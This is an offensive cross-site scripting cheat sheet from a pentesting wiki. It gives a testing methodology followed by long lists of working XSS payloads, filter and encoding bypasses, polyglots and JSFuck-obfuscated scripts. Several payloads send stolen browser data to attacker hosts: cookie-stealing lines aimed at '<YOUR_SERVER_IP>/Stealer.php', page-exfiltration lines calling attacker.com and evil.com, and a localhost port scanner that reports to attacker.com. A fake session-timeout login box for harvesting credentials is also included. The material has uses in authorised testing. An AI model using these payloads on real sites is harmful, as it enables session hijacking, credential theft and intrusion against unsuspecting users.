Physical attacks
Mobile Apps Pentesting
Pentesting

XSS (Cross Site Scripting)

Methodology

1- Check if the server response includes content sent by you 2- Find where is located the input controlled by you (inside a tag, outside, inside the URL --Form with PHP_SELF--, inside javascript code?) 3- Check how can you add javascript code 3.1- On a event inside a tag (onerror, onfocus, href...) 3.2- Closing a tag and opening a new one ( "><img …") 3.3- Open a new tag("<script>...") 3.4- Altering the Javascript code execution 4- Check which characters are allowed (can you close and/or open a tag? can you create a new event handler? can you inject javascript code?) 5- Create a PoC

In the case that you cannot exploit a injection vulnerability as a XSS check Dangling Markup - HTML scriptless injection.

Tags

<img src=x onerror=alert(document.cookie);>
<body onload=alert('test1')>
<button onfocus=alert(1) autofocus>
<iframe src="javascript:alert(0)" height="0" width="0">
<iframe src="data:text/html;base64,PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4=">
<svg onload=alert('XSS')>
<svg onload=alert(1)>
<Video><source onerror="alert('XSS')">
<audio><source onerror="alert('XSS')">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<body ontouchstart=alert(1)> // Triggers when a finger touch the screen
<body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen
<body ontouchmove=alert(1)> // When a finger is dragged across the screen

More

XSS uploading files (svg)

Upload as an image a file like the following one (from http://ghostlulz.com/xss-svg/):

Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("Ghostlulz XSS");
</script>
</svg>
-----------------------------232181429808--

Clickjacking needed

<b onmouseover=alert('Wufff!')>click me!</b>
<isindex x="javascript:" onmouseover="alert(XSS)">click me!
<input type="text" value="" Onblur=alert(666) size="30">
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<img ismap= itemtype='yyy style=width:100%;height:100%;position:fixed;left:\ 0px;top:0px; onmouseover=alert(/XSS/)//'>
<img ismap=itemtype=yyy style=width:100%;height:100%;position:fixed;left:0px;top\ :0px; onmouseover=alert(/XSS/)//>
<a href="#" onclick="alert(1)"> //If the user clicks in the next <a> the alert will be executed

XSS on UTH path

https://github.com/RealLinkers/cookieless

Exfiltrate code

<img src='http://attacker.com/log.php?HTML= //Get all code until next '
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text= //Get all code until next '
<textarea autofocus onfocus=alert(1) //Get all code

Special combinations

<iframe/src="data:text/html,<svg onload=alert(1)>">
<input type=image src onerror="prompt(1)">
<svg onload=alert(1)//
<img src="/" =_=" title="onerror='prompt(1)'">
<img src='1' onerror='alert(0)' <
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1'&#41</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);"

You can also try to send all possible tags and all possible events and using: https://gitlab.com/jlajara/xss-tag_event-analyzer find if there is any combination of tags and events suitable to exploit the XSS. More info in: https://jlajara.gitlab.io/posts/2020/01/25/XSS_tag_event_analyzer.html.

Basic Bypass

script --> ScrIpT
<ScrIpT>alert(1)</ScrIpT>
space == / == /*%00/ == /%00*/
Strings --> "XSS" == /XSS/.source
<input/autofocus/*%00//%00*/onfocus=alert(1)>
Not close ending with " <" or " //": <iframe SRC="javascript:alert('XSS');" <
Extra open: <<script>alert("XSS");//<</script>
Subs parenthesis for `` in alert and setTimeout: <details open ontoggle=alert`1`> setTimeout`alert\u0028document.domain\u0029`;
Add unnecessary fields
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
Input as image: <input type=image src onerror="prompt(1)">

PHP FILTER_VALIDATE_EMAIL flag Bypass

"><svg/onload=confirm(1)>"@x.y

Ruby-On-Rails bypass

Due to RoR mass assignment quotes are inserted in the HTML and then the quote restriction is bypassed and additoinal fields (onfocus) can be added inside the tag. Form example (from this report), if you send the payload:

contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa

The pair "Key","Value" will be echoed back like this:

{" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}

Then, the onfocus attribute will be inserted:

An a XSS occurs.

From here: You can execute an XSS payload inside a hidden attribute, provided you can persuade the victim into pressing the key combination. On Firefox Windows/Linux the key combination is ALT+SHIFT+X and on OS X it is CTRL+ALT+X. You can specify a different key combination using a different key in the access key attribute. Here is the vector:

<input type="hidden" accesskey="X" onclick="alert(1)">

The XSS payload will be something like this: " accesskey="x" onclick="alert(1)" x='

You might have a link element with a rel attribute on canonical, if you inject the accesskey attribute with an onclick event then you have XSS. <link rel="canonical" accesskey="X" onclick="alert(1)" />

XSS in 20 length

Taken from the blog of Jorge Lajara.

<svg/onload=alert``>
<script src=//aa.es>
<script src=//℡㏛.pw>

The last one is using 2 unicode characters which expands to 5: telsr

More of these characters can be found here. To check in which characters are decomposed check here.

Space,onXXX=,javascript: Bypass

Substitute the space for: %0A (\n) %09 (\t) %0D (\r)

<iframe src="javascri%0Apt:alert(0)">
<iframe src="javascri%09pt:alert(0)">
<iframe src="javascri%0Dpt:alert(0)">
<iframe src="javascript://%0Aalert(1)">
<iframe src="javascript://anything%0D%0A%0D%0Awindow.alert(1)">
<img src onerror%0A=alert(1) />
<img src onerror%09=alert(1) />
<img src onerror%0D=alert(1) />

Javascript encondings

Unicode

https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md Valid as String inside a script or name of a function inside a HTML tag (not parameter or parenthesis) \u0061 --> "a" \u{61} --> "a"

alert(1)
<script>\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029</script> NOT WORK
<script>eval('\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029')</script> WORK
<img src onerror=\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029 /> NOT WORK
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) /> WORK
<svg onload="javascript:\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029" // NOT WORK
<svg onload=\u0061\u006C\u0065\u0072\u0074(1) // WORK
<iframe src="javascript:\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029"></iframe> NOT WORK
<iframe src="javascript:\u0061\u006C\u0065\u0072\u0074(1)"></iframe> WORK

Can do the same using this syntax: \u{61}

Surrogate Pairs

https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md https://mathiasbynens.be/notes/javascript-unicode https://mathiasbynens.be/notes/javascript-encoding Find Unicode surrogate pairs of 2 chars (The last 2 bytes of the H == 1ºchar and last 2bytes of L ==2ºchar)

def unicode(findHex):
for i in range(0,0xFFFFF):
H = hex(int(((i - 0x10000) / 0x400) + 0xD800))
h = chr(int(H[-2:],16))
L = hex(int(((i - 0x10000) % 0x400 + 0xDC00)))
l = chr(int(L[-2:],16))
if(h == findHex[0]) and (l == findHex[1]):
print(H.replace("0x","\\u")+L.replace("0x","\\u"))

URLencode

%61 --> "a"

alert(1)
<script>%61%6c%65%72%74%28%31%29</script> NOT WORKS
<script>eval("%61%6c%65%72%74%28%31%29")</script> NOT WORKS
<img src onerror="javascript:%61%6c%65%72%74%28%31%29" /> NOT WORKS
<svg onload="javascript:%61%6c%65%72%74%28%31%29" // NOT WORKS
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe> WORKS

HTML entities

Valid inside HTML tags (not inside <script>)

&#x Hexadecimal with or without zeros

&#61 --> "a" &#00061 --> "a"

alert(1)
<script>&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29</script> NOT WORKS
<script>eval("&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29")</script> NOT WORKS
<img src onerror=&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29 /> WORKS
<img src onerror="&#x00061&#x0006c&#x00065&#x00072&#x00074&#x00028&#x00031&#x00029" /> WORKS
<svg onload=&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29 // WORKS
<iframe src="javascript:&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29"></iframe> WORKS( javascript:alert(1) )

&# Decimal with or without zeros

&#97 --> "a" &#00097 --> "a"

alert(1)
<script>&#97&#108&#101&#114&#116&#40&#49&#41</script> NOT WORKS
<script>eval('&#97&#108&#101&#114&#116&#40&#49&#41')</script> NOT WORKS
<img src onerror=&#97&#108&#101&#114&#116&#40&#49&#41 /> WORKS
<img src onerror=&#00097&#000108&#000101&#000114&#000116&#00040&#00049&#00041 /> WORKS
<svg onload=&#97&#108&#101&#114&#116&#40&#49&#41 // WORKS
<iframe src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41"></iframe> WORKS( javascript:alert(1) )

Entities

( --> &#40;
document.cookie
<script>alert(document.cookie)</script> NOT WORKS
<script>eval(alert(document.cookie))</script> NOT WORKS
<img src onerror=alert(document.cookie) /> WORKS
<svg onload=javascript:alert(document.cookie) // WORKS
<iframe src=javascript:alert(document.cookie)> WORKS

Hexadecimal

Valid as String inside a script \x61--> "a"

alert(1)
<script>\x61\x6c\x65\x72\x74\x28\x31\x29</script> NOT WORKS
<script>eval("\x61\x6c\x65\x72\x74\x28\x31\x29")</script> WORKS
<img src onerror=\x61\x6c\x65\x72\x74\x28\x31\x29 /> NOT WORKS
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' // NOT WORKS
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' /> WORKS //<svg onload=alert(1)>

Octal

Valid as String inside a script \141 --> "a"

alert(1)
<script>\141\154\145\162\164\50\61\51</script> NOT WORKS
<script>eval("\141\154\145\162\164\50\61\51")</script> WORKS
<img src onerror=\141\154\145\162\164\50\61\51 /> NOT WORKS
<svg onload=javascript:'\141\154\145\162\164\50\61\51' // NOT WORKS
<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' /> WORKS //<svg onload=alert(1)>

Data encodings

<object data="data:text/html,<script>alert(1)</script>"></object>
<object data="data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e"></object>
<object data="data:text/html;charset=UTF-8,<script>alert(1)</script>"></object>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object>
<object data="data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg"></object>

Retrieve Cookies

<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
<script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script>
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>

Other Payloads

Port Scanner

const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); }

Box to as for credentials

<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>

Javascript Tricks

alert(String.fromCharCode(88,83,83))
alert`document.cookie`
alert(document['cookie'])
with(document)alert(cookie)
eval('ale'+'rt(1)')
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)

XSS in dynamic created PDF

If a web page is creating a PDF using user controlled input, you can try to trick the bot that is creating the PDF into executing arbitrary JS code. So, if the PDF creator bot finds some kind of HTML tags, it is going to interpret them, and you can abuse this behaviour to cause a Server XSS. Find more information here.

XSS resources

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection http://www.xss-payloads.com https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt https://github.com/materaj/xss-list https://github.com/ismailtasdelen/xss-payload-list https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec

Polyglots

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`

A HTML comment can be closed using --> or --!>

Obfuscation & Advanced Bypass

https://github.com/aemkei/katakana.js https://ooze.ninja/javascript/poisonjs https://javascriptobfuscator.herokuapp.com/ https://skalman.github.io/UglifyJS-online/ http://www.jsfuck.com/ More sofisticated JSFuck: https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce

<script>([,,,,,]=[]+{},[,,,,,,,,,,]=[!!]+!+.)[=++++++++++][](+++++'(-~ウ)')()</script>
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+